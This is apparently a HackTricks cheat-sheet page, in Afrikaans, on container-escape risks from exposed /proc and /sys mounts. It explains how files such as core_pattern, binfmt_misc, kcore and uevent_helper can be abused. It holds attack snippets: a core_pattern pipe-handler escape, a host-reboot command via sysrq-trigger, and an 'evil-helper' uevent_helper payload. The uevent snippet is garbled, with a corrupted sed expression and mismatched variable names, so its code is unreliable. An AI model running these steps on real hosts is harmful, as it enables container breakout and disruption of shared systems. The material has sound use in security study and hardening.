Sensitiewe Monte
Reading time: 6 minutes
tip
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Die blootstelling van /proc
en /sys
sonder behoorlike naamruimte-isolasie stel beduidende sekuriteitsrisiko's in, insluitend die vergroting van die aanvaloppervlak en inligtingsontsluiting. Hierdie gidse bevat sensitiewe lêers wat, indien verkeerd geconfigureer of deur 'n nie-geautoriseerde gebruiker toegang verkry, kan lei tot houerontvlugting, gasheerwysiging, of inligting kan verskaf wat verdere aanvalle ondersteun. Byvoorbeeld, om -v /proc:/host/proc
verkeerd te monteer kan AppArmor-beskerming omseil as gevolg van sy pad-gebaseerde aard, wat /host/proc
onbeskermd laat.
Jy kan verdere besonderhede van elke potensiële kwesbaarheid vind in https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts.
procfs Kwesbaarhede
/proc/sys
Hierdie gids laat toegang toe om kern veranderlikes te wysig, gewoonlik via sysctl(2)
, en bevat verskeie subgidse van bekommernis:
/proc/sys/kernel/core_pattern
- Beskryf in core(5).
- Laat toe om 'n program te definieer wat uitgevoer moet word op kernlêer generasie met die eerste 128 bytes as argumente. Dit kan lei tot kode-uitvoering as die lêer met 'n pyp
|
begin. - Toets en Exploit Voorbeeld:
[ -w /proc/sys/kernel/core_pattern ] && echo Ja # Toets skrywe toegang
cd /proc/sys/kernel
echo "|$overlay/shell.sh" > core_pattern # Stel pasgemaakte handler in
sleep 5 && ./crash & # Trigger handler
/proc/sys/kernel/modprobe
- Gedetailleerd in proc(5).
- Bevat die pad na die kernmodule-laaier, wat aangeroep word om kernmodules te laai.
- Kontroleer Toegang Voorbeeld:
ls -l $(cat /proc/sys/kernel/modprobe) # Kontroleer toegang tot modprobe
/proc/sys/vm/panic_on_oom
- Verwys na proc(5).
- 'n Globale vlag wat beheer of die kern paniek of die OOM moordenaar aanroep wanneer 'n OOM toestand voorkom.
/proc/sys/fs
- Volgens proc(5), bevat opsies en inligting oor die lêerstelsel.
- Skrywe toegang kan verskeie ontkenning-van-diens aanvalle teen die gasheer moontlik maak.
/proc/sys/fs/binfmt_misc
- Laat toe om interpreteerders vir nie-inheemse binêre formate te registreer gebaseer op hul magiese nommer.
- Kan lei tot voorregverhoging of wortel-sheltoegang as
/proc/sys/fs/binfmt_misc/register
skryfbaar is. - Betrokke exploit en verduideliking:
- Poor man's rootkit via binfmt_misc
- Diepgaande tutoriaal: Video skakel
Ander in /proc
/proc/config.gz
- Mag die kernkonfigurasie onthul as
CONFIG_IKCONFIG_PROC
geaktiveer is. - Nuttig vir aanvallers om kwesbaarhede in die lopende kern te identifiseer.
/proc/sysrq-trigger
- Laat toe om Sysrq-opdragte aan te roep, wat moontlik onmiddellike stelselhervattings of ander kritieke aksies kan veroorsaak.
- Hervatting van Gasheer Voorbeeld:
echo b > /proc/sysrq-trigger # Hervat die gasheer
/proc/kmsg
- Blootstel kernringbufferboodskappe.
- Kan help in kern exploits, adreslekas, en sensitiewe stelselinligting verskaf.
/proc/kallsyms
- Lys kern uitgevoerde simbole en hul adresse.
- Essensieel vir kern exploit ontwikkeling, veral om KASLR te oorkom.
- Adresinligting is beperk met
kptr_restrict
op1
of2
gestel. - Besonderhede in proc(5).
/proc/[pid]/mem
- Interfereer met die kern geheue toestel
/dev/mem
. - Histories kwesbaar vir voorregverhoging aanvalle.
- Meer oor proc(5).
/proc/kcore
- Verteenwoordig die stelsel se fisiese geheue in ELF kernformaat.
- Lees kan die gasheer stelsel en ander houers se geheue-inhoud lek.
- Groot lêergrootte kan lei tot leesprobleme of sagtewarekrake.
- Gedetailleerde gebruik in Dumping /proc/kcore in 2019.
/proc/kmem
- Alternatiewe interfase vir
/dev/kmem
, wat kern virtuele geheue verteenwoordig. - Laat lees en skryf toe, dus direkte wysiging van kern geheue.
/proc/mem
- Alternatiewe interfase vir
/dev/mem
, wat fisiese geheue verteenwoordig. - Laat lees en skryf toe, wysiging van alle geheue vereis die oplos van virtuele na fisiese adresse.
/proc/sched_debug
- Gee proses skedulering inligting terug, wat PID naamruimte beskermings omseil.
- Blootstel prosesname, ID's, en cgroup identifiseerders.
/proc/[pid]/mountinfo
- Verskaf inligting oor monteerpunte in die proses se monteernaamruimte.
- Blootstel die ligging van die houer
rootfs
of beeld.
/sys
Kwesbaarhede
/sys/kernel/uevent_helper
- Gebruik vir die hantering van kern toestel
uevents
. - Skryf na
/sys/kernel/uevent_helper
kan arbitrêre skripte uitvoer wanneeruevent
triggers plaasvind. - Voorbeeld vir Exploit: %%%bash
Skep 'n payload
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
Vind gasheer pad van OverlayFS monteer vir houer
hostpath=$(sed -n 's/.\perdir=([^,]_).*/\1/p' /etc/mtab)
Stel uevent_helper in op kwaadwillige helper
echo "$host_path/evil-helper" > /sys/kernel/uevent_helper
Trigger 'n uevent
echo change > /sys/class/mem/null/uevent
Lees die uitvoer
cat /output %%%
/sys/class/thermal
- Beheer temperatuurinstellings, wat moontlik DoS aanvalle of fisiese skade kan veroorsaak.
/sys/kernel/vmcoreinfo
- Lek kern adresse, wat moontlik KASLR in gevaar kan stel.
/sys/kernel/security
- Huisves
securityfs
interfase, wat konfigurasie van Linux Sekuriteitsmodules soos AppArmor toelaat. - Toegang mag 'n houer in staat stel om sy MAC-stelsel te deaktiveer.
/sys/firmware/efi/vars
en /sys/firmware/efi/efivars
- Blootstel interfaces vir interaksie met EFI veranderlikes in NVRAM.
- Verkeerde konfigurasie of eksploit kan lei tot gebroke skootrekenaars of onbootbare gasheer masjiene.
/sys/kernel/debug
debugfs
bied 'n "geen reëls" debugging interfase aan die kern.- Geskiedenis van sekuriteitskwessies as gevolg van sy onbeperkte aard.
Verwysings
- https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts
- Understanding and Hardening Linux Containers
- Abusing Privileged and Unprivileged Linux Containers
tip
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.